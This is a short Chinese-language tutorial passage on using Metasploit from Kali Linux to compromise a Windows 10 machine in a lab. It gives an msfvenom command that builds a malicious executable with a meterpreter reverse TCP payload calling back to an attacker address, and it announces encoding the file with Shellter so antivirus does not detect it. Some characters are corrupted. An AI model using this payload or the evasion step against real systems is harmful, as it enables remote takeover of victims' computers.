Metasploit框架是全球黑客最常用的框架。它允許黑客設(shè)置創(chuàng)建有利環(huán)境（稱為Meterpreter）的偵聽器來操縱受感染的計(jì)算機(jī)。在本文中，我們將了解Kali Linux中的這個(gè)框架如何用于攻擊Windows10計(jì)算機(jī)。我們將使用Shellter通過惡意可執(zhí)行文件執(zhí)行此操作。

本文假設(shè)已經(jīng)完成了Kali Linux的安裝，并且可以通過VirtualBox上的Windows機(jī)器的橋接連接來訪問。

創(chuàng)建惡意.exe文件

要?jiǎng)?chuàng)建可執(zhí)行文件，您可以使用msfvenom，如下面的命令所示：

msfvenom -p windows / meterpreter / reverse_tcp -a x86 -platform windows -f exe LHOST = 192.168.100.4 LPORT = 4444 -o /root/something32.exe

上面的命令指示msfvenom生成一個(gè)32位Windows可執(zhí)行文件，該文件為有效負(fù)載實(shí)現(xiàn)反向TCP連接。必須將格式指定為類型.exe，并且必須定義本地主機(jī)（LHOST）和本地端口（LPORT）。在我們的例子中，LHOST是我們攻擊的Kali Linux機(jī)器的IP地址，LPORT是在目標(biāo)受到攻擊后監(jiān)聽來自目標(biāo)的連接的端口。

要獲取我們的IP地址，我們?cè)贙ali中使用ifconfig命令，將接口指定為eth0（因?yàn)槲覀冊(cè)谝蕴�網(wǎng)上），如下所示。

下面的屏幕截圖顯示了成功.exe生成時(shí)命令的輸出。

防病毒解決方案通過檢測可執(zhí)行文件中的惡意簽名來工作。 因此，我們的文件將在Windows環(huán)境中被標(biāo)記為惡意文件。 因此，我們必須找到一種方法來修改它以繞過防病毒檢測。 我們將對(duì)其進(jìn)行編碼以使其完全不可檢測，或FUD。